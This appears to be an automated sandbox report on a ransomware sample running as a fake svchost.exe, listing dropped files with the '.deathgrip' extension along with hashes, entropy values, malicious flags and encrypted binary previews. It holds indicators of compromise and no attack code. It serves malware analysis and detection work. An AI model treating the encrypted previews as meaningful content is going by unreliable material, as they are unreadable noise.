                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):533104
                                                          Entropy (8bit):7.9996246409445
                                                          Encrypted:true
                                                          SSDEEP:12288:ZD/PW/AuUsLLOMoJiEuO7NZXJKC3vXrdGdq45pn:ZDW/AYLOMkiNOxZXJKCfbM
                                                          MD5:6D4B3CEE853EB7674B19DE8E1BDEDB73
                                                          SHA1:EEA1182B4E7A6C0D03EAA0F8660708F61530C753
                                                          SHA-256:40D3144CD96464822E12B54F7A1EF29939B81E5DD47CC431192ED0A226366AC5
                                                          SHA-512:AC5B4C03BC76914911F8D7D0C3C726176ACD4B78BA89EA5A78FF214EF8ECB85A677D0F23C3C95B3629AB1CA557690083E18B4E968F8174F0707E953EBF56927B
                                                          Malicious:true
                                                          Preview:..........Oc..^.n..1z..^....>..n.?.m..Ou..h......ZEh..p.r......;mw....)c_.....c^..Y..V.7..lI..x...7.9,1...{-...*.bR.I...V*k....[.....q......_...#.|-..lO.C7.CR:....,o\...:$..3ry.C..#.Q.....3`...#h.#..y..5.R.....6R.[...!...z#w.J..."..*yk@2..v4...a.]mM..8...l.v....X....8....i..4.....w.3......K+/....).....H.[...}X......+w.....Z...Z...2..Z<..O/&.....8.).b...v".....W.w.Z.6,.W....YA.R...7V. /&...6..x.......p...[.;s>..1_+..I.lo.P......~.Dr..D....-.+.=g.Pm,;u.<.._...[j.s....=..?...l.Z"...\..jh...7....!.:3.{.........!.4.".2..y.;...g...q...S.X.......+..$...@..o...V..].w8........,>........IR(Z.G. ......*....2.3.7.7.S...%.k....../..yk..N..S....'3...>...<..|..6.".y|....1.....+)....]'....6?..]]...Ma...5.5....Q..g].z.a.....<J.q.'.....A1".!jP.LY...rv|......*U.....%.\.PYRy.}tAa..8k...].hD....R.S.xa....F.%.....67...I.....P..=.0] .D.c2..%........K....%......&..R{.R*..ye.,F%/........C..".......y..v.ELC.d...ha.......P..4..,.2.`9V..h6.t.]p.....&.a-..C.5.....c..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsglobals.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsglobals.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44864
                                                          Entropy (8bit):7.995469226171539
                                                          Encrypted:true
                                                          SSDEEP:768:xJuLhLOXTJifAxmd4Mgpwv2cr28i/3TJzs/+HPH7l2qXim1Dx+ehPqG:2LIXTGMP1yXRi/Txs/SPbwqymtlhF
                                                          MD5:007B4E18AE82E1BC2C082A85B8C02EB3
                                                          SHA1:450BBEA4179764D497D99A409F92E28D0ABF3656
                                                          SHA-256:CB4240E3206229412E9130676714CF5F4C2CEB554EC8B06EC024B54CD1465C01
                                                          SHA-512:A6CB8B611019205D915ACE9E1CE19A4750438789D103ECCE77DC651B5D287B1F4BE21E77A9BC4D3D7A2A33AABA41473F94D8089EE78F6A73359F4C2F50597872
                                                          Malicious:true
                                                          Preview:........`C.....;!qwb.p^1.Ps@g.1{....V...A.u..I.5W...@.MuSKi..yz.....vp.........o....N5...p..X.'..X..]...zV3..4..0.-Ob..#Q..R...7k.?... ..7&.~...mdo...L.s.*R(..HAr....6....@.%?i..lGOl.A\..c.]a&..i.....h..#...........4.@..>z9}...Ms.&k.|...].{2.l.... .../....a.;(.b.xLy...c...Ha.A.@...B...Z./.a..&.tv.l...+....?V.=.U....l.XJ.f.U.xk.F....N...+..R.^..ye..@9.=.y].j.y..|......h......O...0.BB....C..].Av`G.c$.K...([..q...,.A....:....u...~.-..F&......w.=5...;.u.k..d....B.fx...=..q.C.....&4...8f.K==&.>.O.(g9#.l..4.r..4...,.|....A...@':..7-.J4..Ih#N...-...8...}`I6....MLh.2..A....T.:........G8UY....&.C.h_.YKyF)iI.m..C.T4......`,=.M0....X:Mgm8R..Z..O'.{.>.R2..$...=..,.$.C9...3<..X...5t.^j....|Z.B.B......^=g......xgl.........&....(/.#..|..Lg}.....Y..^o..sP....[..6.....us....Y.@R...T....Y7.y..8S.5...G.7Guh$.O...........^zj!.s.!.2....1...'...>B..I...4.)^....9....|g..4...c./.]..(.7.|L.d..._.V-.....?...)NAi....:.*...>g.+....q....7.L.W./...\J.3.ZM..j.`..<.<y.!.

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104080
                                                          Entropy (8bit):7.99807190347203
                                                          Encrypted:true
                                                          SSDEEP:1536:QnY/vTQQGzwB5/WdSDf4OizYVk4jhfR1NFkLjOeM9U4PISCZPan121kS:QnkTeq/WdSDf4jmVjhp1NFWjOEZCnOkS
                                                          MD5:721AE8640134719AF69E699A9488E546
                                                          SHA1:45487367B85896379317C0D4896ED0FE01DFEA64
                                                          SHA-256:4DD3B3AF791B2632FF319B91A1398311AD05F21674EF4BEA997E84DE7EE49187
                                                          SHA-512:D98708E002C993FA329E54CB12C0E24A8FCAD91E8EFC36ED3BDAEE23F7AC839A3B3735C0DE2ECF44C79B06F28D879E352B94B77545CEBCDAD08673C885DE5D0F
                                                          Malicious:true
                                                          Preview:.............X..M...D..9..2..P........^.2....'..L.cF?..*c...'.OcE.|.Z.?w..Y?G....R>..v..vJ..U..o|.{..?1V......;...$......Ntr|..g.G.........}.....0...$.Z...EH..;..*.g|t...n.1!M.../WmS......V..o..L..;..N..$...x.....^}N.@)...D..<.@.pT..n.h......;.M....9.....7.[5...^9..2...5...3}k{`....Hc...D. 2E..u.....^.d{..D.l..........W ...W....^.%+b..B...K.D.[.T.X.P.S(}..#)b...pm....].6....]......-..../......!......l.r..P.D.... ..gS.?...F.\..2.q....[..Rp..n.......z.7...30...jVd.....LxO.N\Kw..;../.......R.D...t...EA..R..m.,....!4..C........]I...;..q.5.p..:m.....E..u.L..N%...-T...$@.Oh5.}:4..R.V.... ..y.`..;9;.}.Y..{.b...3.Oe.l...{v>..WA...(g..y;e..-... ....(W...W.D..8...;.@(:..K....9.........L..eX5.._....V.)..|...>Qh*..-..\.{...{......9.;.$..o..$X.0m'S3.h.X...}IO..9...!.&..3....&C#3+zc.I.W;...8...9*z.......W..hL..M.91%../....7A....c(F.....v...EZ...E..U..%.Y.....Gd..N..{.d..M.."vM.4r.q....*..|....9g..Kw.I..rQ8....3....-.Jp 's.;........m..a..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217872
                                                          Entropy (8bit):7.999146933616393
                                                          Encrypted:true
                                                          SSDEEP:3072:RdNwZ4m1piOhNN+oW89gyrIx6QDa/5gxPxZvvcqWKQeWvF4p+O8xhSKJuas21:RUum1piOJ+oXgkx5g5xZQKdCWs
                                                          MD5:8BF90A300CEB2FC2992790D42074CFBF
                                                          SHA1:8FB0EF901BEE53328DE79804566B480AA784F860
                                                          SHA-256:6A5B17CDC8E1677FEB25467537840E900F1CC54D6E4F64C7986F302B88AE2EC1
                                                          SHA-512:94BC5ACA181C3DDDDE7FDC86C5818D833B9A495BFAD824FDAD9A20E151B96871EDCAA1C98D7DB607EF9B41E018140D389EB1DEC3E03FD454F59D25BEC2F49A28
                                                          Malicious:true
                                                          Preview:........H=.9.M.....(~.s..A...Q...RIY7.p..2...G3.c...><.O..@v.M.....m....-.C*..C...m.....z....X`..j....h....l........6...Q..].....2.`|......6\/~...&..\..r#...7.^WB.....W..T.r.....vR.....4.4..O.c.JT.[.....`B..s....%).>....+.K..Q.W...3.KnjJ._M..,.x.u.......&.x...6....Zk.....Zy.}Q..$...4..(=)>.us.*.."p]4.F].T.!.p...~!...K...>.>......V1..2{9. y.H.. !c~.....K..Mbr.._...sG..<....k...O5..q.^]l..I........T.-....'...'..p./jAC..rV.i.v..)..l...O.*+.?...2.o..B.H...\.G.U.g..\...2.@.L..&.2i....H..u..k....q..0av..,....U.|..F.@>S.SR+A.Q.%....E,}.2.;..(tE.B.P.l...@{..tl{..J.(!.....l4ye..K.f.]J...2.....?8."^.Q.D.Y....~}Z*.......3&^..F....^....q.(.[......$J.;x..j|.AU....I.....D..~.{hJ...\1../W.g?..Y..<.Y..!j..\....z...-.E..l...C8..R...v.kv...x.....).B.h.......Rn...aY.|.....@1?.e@.M...i..-.Oi...kgq.u?....|..1^..g..e.o...~.A.#.$|.......TW...... ...JH2.X.......|............-...b..z@..&......ak..../.5.w0 ..*.5...H.QD.B../......:u9..A...7.$4.O.........~

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.1.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.1.filtertrie.intermediate.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.108473620748518
                                                          Encrypted:false
                                                          SSDEEP:6:9mpK4fcVEGSmTqW86C7inR/p/+drXGTGvNCyhWhGVSGiWgkxVRN3asXvFVa6yRk2:kpKkGSmTLDIML8kyhWh0gkxV3T9V869W
                                                          MD5:6C47614A55AB6BCFEEA74DF15449F4C8
                                                          SHA1:5D379095F6DBCFB5543F82513229CE9618A06CD4
                                                          SHA-256:8B4506708050B53E18CD472E5E7BDF83039085F47562D839518F8321608FD616
                                                          SHA-512:ECD27D99CA9544532F39437AC3FD07EF922D690F7EFED9065C621A008B3C0B5925A67DD87EC36F5CE8989AD7E42E506B5AE5F0095241E2FA7127748F4AC8AAF6
                                                          Malicious:false
                                                          Preview:.........nR.dLk.o.[.....pj+tD+AhuRcSJKJvH0EXcFy2lMwEO/h1njqwi5snX0tTaI1Sg+7890ffBqeA8DU3fo2VLywNvFqadQXHtzXMJ5oWz8fqv78egWbcbMuY/M5hRQCPXxIoPyJEPcWp/1rcstkm4Djs/kJquSxvW+jn8DKKG6NDJD2303w1He+wtadepYqxEAM79tflSVUo0DR17hHnpuzZ20CKkGelLABpy7utoviZ4jrTfMD81vpGP/muGoKu1I3g8Bzp/a5t55M/Kwy5Pwqnh3OrJ0W72q8szAUTMIOF7+xrXwU8BVMIjEbp5UyiJxv+dIfNQC7O7d3umrNSdf+gXDO7Ek4wF6IvFQ==

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.2.filtertrie.intermediate.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.111849914517111
                                                          Encrypted:false
                                                          SSDEEP:6:nanOg0aBvAq5eo5W0yLGvF5dIAym+BTkSAAC82bTHmnYXM8OWmhK:na1BvAq54y1z+IS7CV/3f
                                                          MD5:24C6B3063D1D8FDDD0C1E2CF7B7619B0
                                                          SHA1:4BC638A0A4299D022D490BCF49759981DA7A65EA
                                                          SHA-256:DBE54395BEC9D56044CA1085FCFE53692288C1C376EA67B57EE2715D203E36B9
                                                          SHA-512:863CC11BB99CAAAECFB0165709F5E1C80A0FCEAF4D0B829C7E8422B439E08EA4F7CDC269131ADD9A013A82932B6096C6967CCE1537195782317D2974EE57D4D7
                                                          Malicious:false
                                                          Preview:........-.-...d.....MqCHBDPIfP8R7bvppQ1ceL84Y4K2TpF1Z5laQZpIOxyuftNRYtfrWFaGUbW9vd8dMk7a0WNQCXQeIA14MPmddhPvB1dJZ3571tn38ivVWh2LHhl+gVqG2oUe4z4mOgKJ4/n4apLQ1oKzbSNTedmng42PxhKqAi0N0IQ5P/j9yaGxKm5alQ9mNa1GqCMEcyOowiN9/paPWJ9k2ZlM0RQC/B9/jTXPsaQerzdghFFA+6g3KjKTdvLlXGdDRz655emCOSIeuNphXP+JgYYBKCNJjrWwnxxMwplb/EXng+OcUMkCFjoOpCu2ypt8XoFiYvgLGSdOADy6lCDRYvtomJoZc7AyA==

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.0.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.0.filtertrie.intermediate.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.1.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.1.filtertrie.intermediate.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.093913420909707
                                                          Encrypted:false
                                                          SSDEEP:6:EC7KJgMfOONWpvS01MSHVjJRFwx/LQ0uMePPgiwGptkCYMXUxXMf6TbMAqsq/Gxr:jKvOOEpFddfQLQ0uvPgiHztXQBTB+G4Q
                                                          MD5:5BA60725AB93E24CF4F9CDE3A63D989E
                                                          SHA1:622933F8967EB9DCBA415EBAF804EB3B67938807
                                                          SHA-256:6EFD4564CA165F561C4E0AD52D614A7187A7545199256AE713A07E21B7AEC0FA
                                                          SHA-512:20AC0AFD354379B2A2AF5146C418BA864559109D509A4E494111F23B501D95136B720714DA89C413268E950F6F067A9BDFBF3B03A7CB0D00D5B9D77953F31A25
                                                          Malicious:false
                                                          Preview:.........x...s.%3...|..x63UmPmMokKm8i1cVf3k6mA3BjzWQmtO8Jyf+dndQKAF8Z5XMAPPSLTxvLX7NT8WcZ09aTjtyaz9PtCP/xAP11UyzGxy/2bd5639yqYsaX7MtuLmf8b1w7Bl8zu2x2XRrxij6fo1I6uc0eUZze1hFEnpCcHsj3miaU22uQhNZbLkL/VV6BtvrK744WqHhq93g8cADQeZ06h21CyolsamloG4TLtTXgM69HQgFbZNmXAt+ROCDYrThUgLAV0dNWJoVeLbUkCXO2mtO0YTKTUKAgHQTRPeJTUAHLVh1qmsrAdxDudDBnw78oICzan2ZLeBLOsv0nq9xeoaXh+vaXaT/g==

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.2.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.2.filtertrie.intermediate.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.089253307631718
                                                          Encrypted:false
                                                          SSDEEP:6:uDGPI2XtOpEvT+44fOmjG3U80OJBHSKlF3XABnnXeyzueP9L6/fARMjOUn1:ug92EvTL4fOmS3UaJZ5lF3XAVXekuk8v
                                                          MD5:37F5E3C9DED162409DC2756311FEA0F5
                                                          SHA1:86212BC45948E5C664AEC33FF3493828A158DEB9
                                                          SHA-256:7EF90C354123B5DFA7B6DB1B0968FE5036C1CE7413F9B4F1845D3F11AAE1E034
                                                          SHA-512:D800E5A9098985783CDF7847BD49D52B90E5A249CE833CC676DC7E524DB50301CE84B03CA1FCD96902C889085227B9021A2209F02AC06684B994C3535985E1E7
                                                          Malicious:false
                                                          Preview:........l..V....:;.P.xqprqgobqKAOYptEhlXPAauYWSY7JS2HkmHYHP45NAkmrqmPgc9nm8w4oozPucgcB+HZMip1gp8wdGlikIurqEiXFa4eM+Mq/mWm19LR3JxucL2YCRL0yWtbUnXO/E4UES/0B7GIsBlnH4USVGpMEtB3uA40jZxy4haSb3FG4dZSadaeFZc9tq4GYAswJanT/GZsnt1ueK/fEIDi8OHFDyzStk0S9bvJipqiPdosN2JHysRrBJQWciI3HJ/0JxobE1mueWjIR8o+sZcIO2qC37jUlWh8IZXn13CKh+eeYnKW3UTgo7Gz1ddUB1I4yxtwjtdOJIWvYWjQfhragMRoFdJQ==

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409666111621045.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409666118862701.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):149056
                                                          Entropy (8bit):7.998783179425257
                                                          Encrypted:true
                                                          SSDEEP:3072:iTBowwqOT1uk0U+QL1cA/6qu/Jv1nGxF6Y4BLXPnp/belw7cIHJ3po3G:GBU7L1cACqu/JJvLXPnNeOcs9F
                                                          MD5:C9D31107262A3EED0B50ACD050AA18B8
                                                          SHA1:6B3411A12A49DE128ABDCB385C8641BEADAA64BA
                                                          SHA-256:BF46E3799466F727EF05F5A9F1B8B4A4D6B10D125A1FCFEEAE12624346E69E2C
                                                          SHA-512:5B623C3860EE037EA6EDC088F7E10C69C6D61701FDDB9FB5F860F02EA8349169BCBD469D68C7F43872E2AD687577A4B149A7ED332B2EC267AB9CB9EC786EF72D
                                                          Malicious:true
                                                          Preview:.............T......*..d.....cd4f..@".......]. ~a.?.^5m.3Y.g.'...6...@M;?.=...w.f._:{...'..}....*.=...$l.<UD&%.(c..&....I..1..MdM.A.%00%./.Z..(.8.X^.~..._.../..MM..k.. .q.E[.b...W{..R .;.k....O.E..q....Q.!.x..%.. ...A...~..wJ.L...%..B.)....^;-.x.d....sV..~...@..N..Au..T@}P..5..Y....N.%q....X]........|.9N.N5z...u.y..~Sj...c[..Uslb..|.,..H..D...D.R.C.....g.>.....e.E...' .w.e...X.3%@...K9(<6.X{.YG.................C....xh....y.me"...[O.....4..@G.......F).GiQx....ju.vq.3..$CZJP#.Yk.x......Jm~h.~....AL....#W.._....yfd..=...Q..By.7.t.........G\..;`P..... .n....d.....fd.*.g..2o.[!.1z.M....1..[....4'.?...Ht....[..5............8.!..t....K........*...=wx.2Q^...zM...~J....Ze.Q.CM`.h...TE...J*W.......l......tq*...b...W....'..Zf.....[u..$..b.q.r.`.3........=...)x.F.]...]...E...@.\.."4N*=....PU...kE... .=V........%0......I?...zZ'.DG........L#.=.........,.Z.)..Dh$...||.\r.. .....w..x....2.K..g7..1....y{.ML......=.M.e...$t ..@.&...1..)....]L....

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
